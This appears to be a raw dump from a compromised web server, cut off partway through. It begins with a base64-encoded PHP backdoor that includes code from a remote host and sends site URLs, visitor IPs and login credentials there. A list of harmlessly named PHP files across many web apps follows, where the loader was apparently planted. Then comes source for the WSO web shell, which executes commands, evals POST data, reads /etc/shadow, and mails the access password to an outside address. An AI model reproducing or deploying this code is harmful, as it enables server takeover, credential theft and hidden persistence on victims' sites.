9DQpwdWJsaWMgZnVuY3Rpb24gZGlyX3JlYWRkaXIoKSB7IHJldHVybiAnJzsgfQ0KcHVibGljIGZ1bmN0aW9uIGRpcl9yZXdpbmRkaXIoKSB7IHJldHVybiAnJzsgfQ0KcHVibGljIGZ1bmN0aW9uIGRpcl9jbG9zZWRpcigpIHsgcmV0dXJuOyB9DQpwdWJsaWMgZnVuY3Rpb24gdXJsX3N0YXQoJHBhdGgsICRmbGFncykgeyByZXR1cm4gYXJyYXkoKTsgfQ0KcHJvdGVjdGVkIGZ1bmN0aW9uIGNvbnRleHQoKSB7IGlmICghJHRoaXMtPmNvbnRleHQpIHsgJHRoaXMtPmNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoKTsgfSAkYyA9IHN0cmVhbV9jb250ZXh0X2dldF9vcHRpb25zKCR0aGlzLT5jb250ZXh0KTsgcmV0dXJuIChpc3NldCgkY1snaHR0cCddKSA/ICRjWydodHRwJ10gOiBhcnJheSgpKTsgfQ0KfQ0KaWYoaXNzZXQoJF9QT1NUWyJsIl0pIGFuZCBpc3NldCgkX1BPU1RbInAiXSkpe2lmKGlzc2V0KCRfUE9TVFsiaW5wdXQiXSkpeyR1c2VyX2F1dGg9IiZsPSIuYmFzZTY0X2VuY29kZSgkX1BPU1RbImwiXSkuIiZwPSIuYmFzZTY0X2VuY29kZShtZDUoJF9QT1NUWyJwIl0pKTt9ZWxzZXskdXNlcl9hdXRoPSImbD0iLiRfUE9TVFsibCJdLiImcD0iLiRfUE9TVFsicCJdO319ZWxzZXskdXNlcl9hdXRoPSIiO31pZighaXNzZXQoJF9QT1NUWyJsb2dfZmxnIl0pKXskbG9nX2ZsZz0iJmxvZyI7fQ0KJHJraHQ9MTsNCmlmKHZlcnNpb25fY29tcGFyZShQSFBfVkVSU0lPTiwnNS4yJywnPj0nKSl7aWYoaW5pX2dldCgnYWxsb3dfdXJsX2luY2x1ZGUnKSl7JHJraHQ9MTt9ZWxzZXskcmtodD0wO319DQppZigkcmtodD09MSl7aWYoaW5pX2dldCgnYWxsb3dfdXJsX2ZvcGVuJykpeyRya2h0PTE7fWVsc2V7JHJraHQ9MDt9fQ0KaWYoJHJraHQ9PTEpe2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjRG92THc9PSIpLiIkcCIuYmFzZTY0X2RlY29kZSgiTG5WelpYSnpMbUpwYzJobGJHd3VjblU9IikuIi8/cl9hZGRyPSIuc3ByaW50ZigiJXUiLCBpcDJsb25nKGdldGVudihSRU1PVEVfQUREUikpKS4iJnVybD0iLmJhc2U2NF9lbmNvZGUoJF9TRVJWRVJbIlNFUlZFUl9OQU1FIl0uJF9TRVJWRVJbUkVRVUVTVF9VUkldKS4kdXNlcl9hdXRoLiRsb2dfZmxnKSl7aWYoJF9QT1NUWyJsIl09PSJzcGVjaWFsIil7cHJpbnQgInN5c19hY3RpdmUiLmB1bmFtZSAtYWA7fX19DQplbHNle3N0cmVhbV93cmFwcGVyX3JlZ2lzdGVyKCdodHRwMicsJ25ld2h0dHAnKTtpZighQGluY2x1ZGVfb25jZShiYXNlNjRfZGVjb2RlKCJhSFIwY0RJNkx5OD0iKS4iJHAiLmJhc2U2NF9kZWNvZGUoIkxuVnpaWEp6TG1KcGMyaGxiR3d1Y25VPSIpLiIvP3JfYWRkcj0iLnNwcmludGYoIiV1IiwgaXAybG9uZyhnZXRlbnYoUkVNT1RFX0FERFIpKSkuIiZ1cmw9Ii5iYXNlNjRfZW5jb2RlKCRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLiRfU0VSVkVSW1JFUVVFU1RfVVJJXSkuJHVzZXJfYXV0aC4kbG9nX2ZsZykpe2lmKCRfUE9TVFsibCJdPT0ic3BlY2lhbCIpe3ByaW50ICJzeXNfYWN0aXZlIi5gdW5hbWUgLWFgO319fQ0K")); ?>
for files:
/home/www/confixx/html/webapps:
./knowledgetree/remote.php ./knowledgetree/download.php ./phpAds/guest.php ./phpAds/create.php ./phpMyFamily/time.php ./phpMyFamily/date.php ./CSLH/report.php ./CSLH/date.php ./weberp/system.php ./weberp/properties.php ./xoops/report.php ./xoops/include.php ./PHProjekt/time.php ./PHProjekt/date.php ./formmail/system.php ./formmail/properties.php ./xrms/includes.php ./xrms/configs.php ./classifieds/base.php ./classifieds/download.php ./HelpCenterLive/links.php ./HelpCenterLive/tests.php ./SSM/includes.php ./SSM/configs.php ./typo/links.php ./typo/tests.php ./4images/options.php ./4images/commands.php ./getid/includes.php ./getid/configs.php ./nucleus/options.php ./nucleus/commands.php ./openit/time.php ./openit/system.php ./tsep/remote.php ./tsep/package.php ./Events/remote.php ./Events/package.php ./Care2x/includes.php ./Care2x/include.php ./pmachinefree/time.php ./pmachinefree/system.php ./gallery/time.php ./gallery/date.php ./videodb/finfo.php ./videodb/contacts.php ./phpdocumentor/base.php ./phpdocumentor/create.php ./UebiMiau/finfo.php ./UebiMiau/tests.php ./Owl/system.php ./Owl/properties.php ./phpSupportTickets/report.php ./phpSupportTickets/include.php ./Links/finfo.php ./Links/contacts.php ./kplaylist/links.php ./kplaylist/package.php ./phpnuke/links.php ./phpnuke/package.php ./bbclone/messages.php ./bbclone/configs.php ./Tellme/links.php ./Tellme/package.php ./phpBugTracker/finfo.php ./phpBugTracker/contacts.php ./sendcard/report.php ./sendcard/date.php ./osCommerce/report.php ./osCommerce/date.php ./skins/includes.php ./skins/include.php ./AutoIndex/time.php ./AutoIndex/system.php ./phpWiki/includes.php ./phpWiki/configs.php ./phpmyforum/remote.php ./phpmyforum/download.php ./openbiblio/layout.php ./openbiblio/properties.php ./osTicket/includes.php ./osTicket/include.php ./phpwhois/layout.php ./phpwhois/properties.php ./AdvancedPoll/layout.php ./AdvancedPoll/properties.php ./PostNuke/report.php ./PostNuke/include.php ./phpDig/common.php ./phpDig/commands.php ./mediawiki/finfo.php ./mediawiki/tests.php ./guestbook/base.php ./guestbook/create.php ./agoracart/report.php ./agoracart/date.php ./cubecart/links.php ./cubecart/tests.php ./xaraya/time.php ./xaraya/date.php ./phpbannerexchange/guest.php ./phpbannerexchange/messages.php ./wbbook/layout.php ./wbbook/options.php ./Siteframe/guest.php ./Siteframe/messages.php ./Drupal/base.php ./Drupal/download.php ./YaBB/time.php ./YaBB/system.php ./phpBB/base.php ./phpBB/download.php ./template/guest.php ./template/create.php ./phpwcms/common.php ./phpwcms/contacts.php ./escene/layout.php ./escene/options.php ./phpwebsite/options.php ./phpwebsite/commands.php ./Coppermine/messages.php ./Coppermine/configs.php ./phpsurveyor/finfo.php ./phpsurveyor/tests.php ./creloaded/remote.php ./creloaded/package.php ./phpList/layout.php ./phpList/options.php ./phpBBAuction/remote.php ./phpBBAuction/package.php ./SupportLogic/base.php ./SupportLogic/create.php ./DocFAQ/guest.php ./DocFAQ/create.php ./gtchat/guest.php ./gtchat/messages.php ./phpMoney/system.php ./phpMoney/properties.php ./MovableType/layout.php ./MovableType/options.php ./squirrelmail/messages.php ./squirrelmail/configs.php ./topdownloads/base.php ./topdownloads/download.php ./noahclass/common.php ./noahclass/contacts.php ./Mambo/common.php ./Mambo/commands.php ./eGroupWare/common.php ./eGroupWare/commands.php ./WebCalendar/common.php ./WebCalendar/contacts.php ./b2evolution/includes.php ./b2evolution/include.php ./vstat/common.php ./vstat/commands.php ./zencart/guest.php ./zencart/messages.php ./WordPress/layout.php ./WordPress/properties.php ./phpBook/links.php ./phpBook/tests.php ./pLog/messages.php ./pLog/configs.php ./geeklog/report.php ./geeklog/include.php ./bookstore/guest.php ./bookstore/create.php ./WebShopmanager/options.php ./WebShopmanager/commands.php ./TUTOS/remote.php ./TUTOS/download.php ./dotproject/finfo.php ./dotproject/contacts.php
/home/www/confixx/html/webapps:
./report.php ./mskin_17/buttons/report.php ./mskin_17/buttons/include.php ./mskin_17/small_icons/common.php ./mskin_17/small_icons/contacts.php ./mskin_17/system.php ./mskin_17/properties.php ./mskin_17/css/left/base.php ./mskin_17/css/left/create.php ./mskin_17/css/top/links.php ./mskin_17/css/top/package.php ./mskin_17/css/help/guest.php ./mskin_17/css/help/messages.php ./mskin_17/css/includes.php ./mskin_17/css/main/remote.php ./mskin_17/css/main/download.php ./mskin_17/css/configs.php ./mskin_17/images/finfo.php ./mskin_17/images/tests.php ./mskin_17/big_icons/time.php ./mskin_17/big_icons/date.php ./include.php ./mskin_15/buttons/base.php ./mskin_15/buttons/create.php ./mskin_15/small_icons/time.php ./mskin_15/small_icons/system.php ./mskin_15/includes.php ./mskin_15/css/left/finfo.php ./mskin_15/css/left/tests.php ./mskin_15/css/top/options.php ./mskin_15/css/top/commands.php ./mskin_15/css/remote.php ./mskin_15/css/help/links.php ./mskin_15/css/help/package.php ./mskin_15/css/main/common.php ./mskin_15/css/main/contacts.php ./mskin_15/css/download.php ./mskin_15/images/layout.php ./mskin_15/images/properties.php ./mskin_15/configs.php ./mskin_15/big_icons/guest.php ./mskin_15/big_icons/messages.php
login-102.hoststar.ch
/home/www/confixx/html/nagioss -> shell
/home/www/confixx/html/post.php
<?php //-----------------Password--------------------- $â297a57a5a743894a0e4a801fc3"; //admin $â = "#fff"; $â = true; $â = 'UTF-8'; $â = 'FilesMan'; $â = md5($_SERVER['HTTP_USER_AGENT']); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) { prototype(md5($_SERVER['HTTP_HOST'])."key", $â); } if(empty($_POST['charset'])) $_POST['charset'] = $â; if (!isset($_POST['ne'])) { if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); } function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);} @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('VERSION', '4.1.0'); if(get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); } if(!empty($â if(isset($_POST['pass']) && (md5($_POST['pass']) == $â rototype(md5($_SERVER['HTTP_HOST']), $â f (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $â ardLogin(); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; function hardHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['â']; global $â; echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."</title> <style> body {background-color:#060a10;color:#e1e1e1;} body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;} table.info {color:#C3C3C3;background-color:#060a10;} span,h1,a {color:$â !important;} span {font-weight:bolder;} h1 {border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;} div.content {padding:5px;margin-left:5px;background-color:#060a10;} a {text-decoration:none;} a:hover {text-decoration:underline;} .ml1 {border:1px solid #1e252e;padding:5px;margin:0;overflow:auto;} .bigarea {width:100%;height:250px; } input, textarea, select {margin:0;color:#fff;background-color:#1e252e;border:1px solid #060a10; font:9pt Courier New;outline:none;} form {margin:0px;} #toolsTbl {text-align:center;} .toolsInp {width:300px} .main th {text-align:left;background-color:#060a10;} .main tr:hover{background-color:#354252;} .main td, th{vertical-align:middle;} .l1 {background-color:#1e252e;} pre {font:9pt Courier New;} </style> <script> var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; var a_ = '" . htmlspecialchars(@$_POST['a']) ."' var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."'; var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."'; var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."'; var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."'; var d = document; function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);} function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;} function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;} function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#1e252e;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form>"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for($j=0; $j<=$i; $j++) $cwd_links .= $path[$j].'/'; $cwd_links .= "\")'>".$path[$i]."/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $â) $opt_charsets .= '<option value="'.$â.'" '.($_POST['charset']==$â?'selected':'').'>'.$â.'</option>'; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['â)) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; $drives = ""; if ($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if (is_dir($drive.':\\')) $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; } echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'. '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://noreferer.de/?http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="' . $explink . '" target=_blank>[ Exploit-DB ]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . viewSize($totalSpace) . ' <span>Free:</span> ' . viewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. viewPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . gethostbyname($_SERVER["HTTP_HOST"]) . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'. '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div>'; } function hardFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>"; echo " </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%> <tr> <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td> <td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=ne value=''> <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'> <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function ex($in) { $â = ''; if (function_exists('exec')) { @exec($in,$â); $â = @join("\n",$â); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $â = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $â = ob_get_clean(); } elseif (function_exists('shell_exec')) { $â = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $â = ""; while(!@feof($f)) $â .= fread($f,1024); pclose($f); }else return "â³ Unable to execute command\n"; return ($â==''?"â³ Query did not return anything\n":$â); } if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$â; if(array_key_exists('pff',$_POST)){ $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru', 'NSA', $tmp); } function hardLogin() { if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } die("<pre align=center><form method=post style='font-family:fantasy;'>Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;'><input type=submit name='pff' value='>>' style='border:none;background-color:#FFDB5F;color:#fff;'></form></pre>"); } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function perms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function viewPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; elseif (!@is_writable($f)) return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; else return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>'; } function hardScandir($dir) { if(function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function which($p) { $path = ex('which ' . $p); if(!empty($path)) return $path; return false; } function actionRC() { if(!@$_POST['p1']) { $a = array( "uname" => php_uname(), "php_version" => phpversion(), "VERSION" => VERSION, "safemode" => @ini_get('safe_mode') ); echo serialize($a); } else { eval($_POST['p1']); } } function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } function actionSecInfo() { hardHeader(); echo '<h1>Server security information</h1><div class=content>'; function showSecParam($n, $v) { $v = trim($v); if($v) { echo '<span>' . $n . ': </span>'; if(strpos($v, "\n") === false) echo $v . '<br>'; else echo '<pre class=ml1>' . $v . '</pre>'; } } showSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) showSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); showSecParam('Open base dir', @ini_get('open_basedir')); showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; showSecParam('Supported databases', implode(', ', $temp)); echo '<br>'; if($GLOBALS['os'] == 'nix') { showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no'); showSecParam('OS version', @file_get_contents('/proc/version')); showSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '<br>'; $temp=array(); foreach ($userful as $â) if(which($â)) $temp[] = $â; showSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $â) if(which($â)) $temp[] = $â; showSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $â) if(which($â)) $temp[] = $â; showSecParam('Downloaders', implode(', ',$temp)); echo '<br/>'; showSecParam('HDD space', ex('df -h')); showSecParam('Hosts', @file_get_contents('/etc/hosts')); showSecParam('Mount options', @file_get_contents('/etc/fstab')); } } else { showSecParam('OS Version',ex('ver')); showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts'))); showSecParam('User Accounts', iconv('CP866', 